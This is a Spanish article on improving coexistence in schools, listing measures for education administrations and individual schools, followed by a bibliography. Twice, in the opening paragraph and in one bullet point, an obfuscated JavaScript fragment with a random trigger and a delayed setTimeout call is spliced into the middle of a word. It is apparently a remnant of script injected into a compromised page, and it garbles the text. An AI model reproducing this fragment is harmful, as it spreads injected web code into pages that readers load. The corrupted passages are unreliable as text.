MEJORAR LA CONVIVENCIA EN LOS CENTROS EDUCATIVOS

Autora: María Mancera Hernández

          El centro educativo es un reflejo de la sociedad: lo que ocurre y se vive en los centros educativos es un espejo de lo que ocurre y se vive en la sociedad. Si en la sociedad priman unos valores basados en relaciones desiguales de distribución de poder, de cultura y de recursos (como el individualismo exagerado, la insolidaridad, el belicismo, la violencia, …) no nos puede extrañar que esos mismos valores aparezcan en los centros, deteriorandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la convivencia en los mismos.

           Son múltiples y de variados tipos los factores que influyen en el deterioro de la convivencia en los centros: unos son de carácter psicológico, otros son de carácter social, otros son de carácter puramente educativo. Algunos de estos factores podríamos resumirlos en: progresiva devaluación de la educación como valor imprescindible, crisis en la socialización familiar, conversión de los menores en potenciales consumidores, ambiente social marcado por la devaluación en la práctica de valores como la tolerancia y el respeto, aparición constante de la violencia en los medios de comunicación y en las relaciones interpersonales e intergrupales, consideración de la violencia como el mejor método para resolver conflictos, etc.

           A los profesionales de la educación y de la enseñanza, los factores que más nos deben preocupar, y sobre los que tenemos que actuar en nuestro trabajo, son los derivados de las insuficiencias o carencias del Sistema Educativo, entendido este en el más amplio sentido: no solo las normativas y actuaciones de las Administraciones Educativas, sino la organización y la gestión de cada centro educativo en concreto. Por ello, para la mejora de la convivencia en los centros, las Administraciones Educativas y los centros educativos tienen que promover medidas tendentes a eliminar, o al menos a disminuir, estos factores que influyen en el deterioro de la convivencia en los centros.

          De entre las medidas que deben promover las Administraciones Educativas para mejorar la convivencia en los centros, destacan las siguientes:

-          Dotación de recursos suficientes tanto materiales como humanos que hagan posible: la reducción de ratios en las aulas; la asignación a los centros de otro tipo de personal educador (además del docente propiamente dicho) como trabajadores y asistentes sociales, mediadores en conflictos, auxiliares, cuidadores, etc.; reforzamiento de la acción tutorial y de los equipos y departamentos de orientación y de atención a la diversidad.

-          Formación del profesorado, tanto inicial como permanente, en temas específicos para mejorar la convivencia, tales como tratamiento y resolución no violenta de conflictos, mediación, dinámica de grupos, etc.

-          Oferta adecuada y de calidad de Programas de Cualificación Profesional o similares.  

-          Programas de formación sobre la convivencia dirigidos a las familias del alumnado y al alumnado mismo.

-          Establecer mecanismos para potenciar los procedimientos de mediación y de resolución no violenta de conflictos como principio educativo.

-          Facilitar a los centros el que puedan actuar de forma eficaz, rápida y precisa cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando aparecen los problemas de convivencia.

-          Ofrecer a los centros fórmulas eficaces y rápidas en defensa jurídica.

-          Exigir a los medios de comunicación el cumplimiento de los compromisos adquiridos para contribuir a la tarea educativa.

-          Creación de mecanismos de coordinación y de ejecución entre las instituciones, organizaciones, organismos, … que están relacionados con la educación (Administraciones, Servicios Sociales, AMPAS, Centros, Asociaciones de Alumnado, …) y dotación de recursos suficientes para su adecuado y correcto funcionamiento.

-          Establecimiento de Planes de Convivencia en los centros, tanto a nivel de Estado como de Comunidades Autónomas.

-          Creación de Observatorios de Convivencia en los centros, tanto a nivel de Estado como de Comunidades Autónomas.

-          Revisar y modificar los Reglamentos Orgánicos de los Centros y los Derechos y Deberes del Alumnado en orden a conseguir coherencia entre ellos y estas propuestas.

            Es de vital importancia para la mejora de la convivencia en los centros las medidas que se tomen en cada centro en concreto. El modelo de organización, gestión y funcionamiento de cada centro determina, en gran medida, la calidad de la convivencia en el mismo. Por ello, se proponen las siguientes medidas:

-          La concepción del centro como un espacio para el desarrollo personal y comunitario.

-          Fomentar la implicación de todos los sectores de la comunidad educativa en todos los temas relacionados con la convivencia, lo que supone estrechar la colaboración entre todos los profesionales del centro, las familias del alumnado, el alumnado y las organizaciones e instituciones relacionados directa o indirectamente con la labor educativa.

-          Fomentar la responsabilidad compartida de todos los miembros de la comunidad educativa.

-          Organizar y distribuir los espacios y los tiempos del centro de manera que sean favorecedores para la mejora de la convivencia.

-          Considerar las actividades extraescolares y extracurriculares como espacio y tiempo favorables para mejorar la convivencia.

-          El centro debe ofrecer propuestas educativas y lúdico-culturales para toda la comunidad escolar.

-          Potenciar las tutorías como medio muy apropiado para mejorar la convivencia.

-          Crear la figura del mediador y fomentar la cultura de la resolución no violenta de los conflictos.

-          Promover medidas activas tendentes a equilibrar y compensar las desigualdades en la oferta y en la práctica educativas.

-          Fomentar el trabajo en equipo entre los trabajadores y entre el alumnado del centro.

-          Optimizar la organización y funcionamiento del Consejo Escolar y de la Comisión de Convivencia, en orden a conseguir la mejora de la convivencia.

-          Establecer un plan para la mejora de la convivencia en el centro.

-          El Proyecto Educativo, el Proyecto Curricular y el Reglamento de Régimen Interno de cada centro deben incorporar explícitamente los valores relacionados con la convivencia (justicia social, solidaridad, cooperación, respeto, tolerancia,  trato igualitario, resolución pacífica de los conflictos, …).

           En resumen, la mejora de la convivencia en los centros educativos es una tarea que debe ser abordada desde todos los ámbitos sociales y es en cada centro educativo donde debe confluir el esfuerzo de todos los sectores: profesorado, otros trabajadores del centro, alumnado, familias del alumnado, servicios sociales, Administración Local, Administraciones Educativas y -en general- todas las organizaciones e instituciones que tienen responsabilidades en educación.


 

 Bibliografía: 

  • · Pujol, E. y Luz, I. (2003)  Valores para la convivencia.  Parramón: Barcelona.
  • · Casamayor, G. y otros (1998)  Cómo dar respuesta a los conflictos. Graó: Barcelona.
  • · Martínez Bonafé, A. y otros (2002)  Vivir la democracia en la escuela. Cooperación
  •   Educativa Kikirikí: Morón (Sevilla).

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.